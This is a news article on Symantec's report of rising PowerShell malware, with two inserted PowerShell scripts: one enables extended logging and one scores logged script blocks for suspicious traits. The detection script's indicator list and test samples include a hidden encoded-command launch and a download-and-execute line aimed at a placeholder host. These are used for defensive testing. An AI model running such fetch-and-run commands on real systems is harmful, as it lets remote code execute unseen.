Microsoft PowerShell, the company's replacement for the Windows command line, has become a target for malware writers, with security software company Symantec claiming to have seen a 95.4 per cent rise in PowerShell malware instances.
PowerShell will become the default alternative to the command line function in Windows when the Creators Edition arrives next year, and has already superseded it in Insider builds.
PowerShell is already available and has been for about ten years. It is generally enabled by default.
In a sandbox test of 111 threat families, nearly all of the analysed scripts were malicious, which shows how great a threat to the enterprise the move could potentially be.
Symantec advises sysadmins to make sure that machines are running the latest version of PowerShell and to enable extended logging and monitoring options. They also (not surprisingly) suggest you buy their software to protect yourself.
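The advice above amounts to two checks a sysadmin can script: confirm the engine version and switch on the extended logging options. The following is an added example written for this article, not code from the article or from Symantec; it assumes an elevated session on a Windows 10 host with PowerShell 5.x, and the transcript directory `C:\PSTranscripts` is an assumed location.

```powershell
# Added example (not from the article or from Symantec): report the installed
# PowerShell version and enable the extended logging that the article refers to.
# Must be run from an elevated (Administrator) session. The registry paths are
# the Group Policy locations that PowerShell 5.x reads on Windows.

# 1. Report the engine version; script block logging needs 5.0 or later.
$version = $PSVersionTable.PSVersion
Write-Host "PowerShell engine version: $version"
if ($version.Major -lt 5) {
    Write-Warning "Script block logging needs PowerShell 5.0 or later (WMF 5.x)."
}

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Helper: create the policy subkey if it is missing and write one value into it.
function Set-PolicyValue {
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $path = Join-Path $policyRoot $SubKey
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    New-ItemProperty -Path $path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 2. Script block logging: the de-obfuscated text of every script block is
#    written as Event ID 4104 to Microsoft-Windows-PowerShell/Operational.
Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1

# 3. Module logging for every module: pipeline execution details as Event ID 4103.
Set-PolicyValue -SubKey 'ModuleLogging' -Name 'EnableModuleLogging' -Value 1
Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'

# 4. Transcription: the full text of each session is saved to a directory.
#    C:\PSTranscripts is an assumed path; in production use a write-only share
#    that the logged-on user cannot read back or delete.
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value 'C:\PSTranscripts' -Type 'String'

# 5. Read the settings back so the change is visible in the console.
Get-ItemProperty -Path (Join-Path $policyRoot 'ScriptBlockLogging')
Get-ItemProperty -Path (Join-Path $policyRoot 'Transcription')
```

In a domain these values are normally pushed through Group Policy (Computer Configuration, Administrative Templates, Windows Components, Windows PowerShell) rather than set locally; the registry writes above are what that policy produces on each machine.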
Among the high-profile cases that have involved PowerShell are the Odinaff Group attacks on financial establishments and the Trojan.Kotver infection, which was created to infect the registry without using any files.
PowerShell can also be used to uninstall security products, detect sandboxes and sniff passwords.
Symantec says: "PowerShell is installed by default on most Windows computers, and most organisations do not have extended logging enabled for the framework. These two factors make PowerShell a favoured attack tool."
It adds: "Furthermore, scripts can easily be obfuscated and allow for payloads to be executed directly from memory."
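Once script block logging is on, the obfuscation and in-memory execution that Symantec describes become visible in the 4104 events, because the logged text is the script as the engine runs it, after any decoding. The following added example (written for this article, not code from the article or from Symantec) scores logged script text against a small indicator list; the indicator list and the sample script blocks are constructed assumptions, a starting point for tuning rather than a complete rule set.

```powershell
# Added example (not from the article or from Symantec): review script block
# logging events (ID 4104) for traits the article quotes, namely obfuscated
# scripts and payloads executed straight from memory.

# Indicator name => regular expression matched (case-insensitively, the default
# for -match) against the logged script text. This list is an assumption.
$indicators = [ordered]@{
    EncodedCommand     = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}'
    Base64Decode       = 'FromBase64String'
    DynamicEvaluation  = '\b(iex|Invoke-Expression)\b'
    RemoteDownload     = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient'
    InMemoryAssembly   = 'Reflection\.Assembly\]::Load'
    NativeMemoryAccess = 'VirtualAlloc|WriteProcessMemory|CreateThread'
    CompressedPayload  = 'GzipStream|DeflateStream'
    SecurityTampering  = 'Set-MpPreference|AmsiUtils'
}

# Score one script block: which indicators matched, how many, and a short preview.
function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = foreach ($name in $indicators.Keys) {
        if ($ScriptText -match $indicators[$name]) { $name }
    }
    $flat = $ScriptText -replace '\s+', ' '
    [pscustomobject]@{
        Hits    = @($hits)
        Score   = @($hits).Count
        Preview = $flat.Substring(0, [Math]::Min(80, $flat.Length))
    }
}

# Pull recent 4104 events from the live log and return only those that scored.
# Property 2 of a 4104 event is ScriptBlockText; property 3 is ScriptBlockId.
function Get-SuspiciousScriptBlockEvents {
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $result = Test-SuspiciousScriptBlock -ScriptText $_.Properties[2].Value
            if ($result.Score -gt 0) {
                [pscustomobject]@{
                    Time          = $_.TimeCreated
                    ScriptBlockId = $_.Properties[3].Value
                    Hits          = $result.Hits -join ','
                    Preview       = $result.Preview
                }
            }
        }
}

# Constructed sample script blocks (not real log data) so the scoring can be
# exercised offline. The base64 blob is filler, not a real encoded command.
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object LastWriteTime'
    'powershell.exe -NoP -W Hidden -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
    '[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)) | Out-Null'
)
foreach ($s in $samples) {
    $r = Test-SuspiciousScriptBlock -ScriptText $s
    Write-Host ("score={0} hits={1} :: {2}" -f $r.Score, ($r.Hits -join ','), $r.Preview)
}
# Expected: the first sample scores 0; the other three score 2 or more each.

# Then run the same scoring over the real log (empty until logging is enabled).
Get-SuspiciousScriptBlockEvents | Format-Table -AutoSize
```

Benign administrative scripts do trip some of these patterns, so the score is better used to prioritise review or to feed a SIEM rule than as a block-or-allow decision on its own.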
OpenSSH has been added to bolster security, but because PowerShell is so much more powerful than the old command line, there are a lot more opportunities for mischief. It does, however, form the basis for the interoperability between Linux and Windows that has been increasingly visible over the past year or so.
Back in August, a version of Windows 10 that was automatically rolled out to machines actually borked PowerShell altogether, leaving it inaccessible for a week.
And, in the same month, Microsoft warned about a new wave of Word macro viruses - utilising security flaws in PowerShell...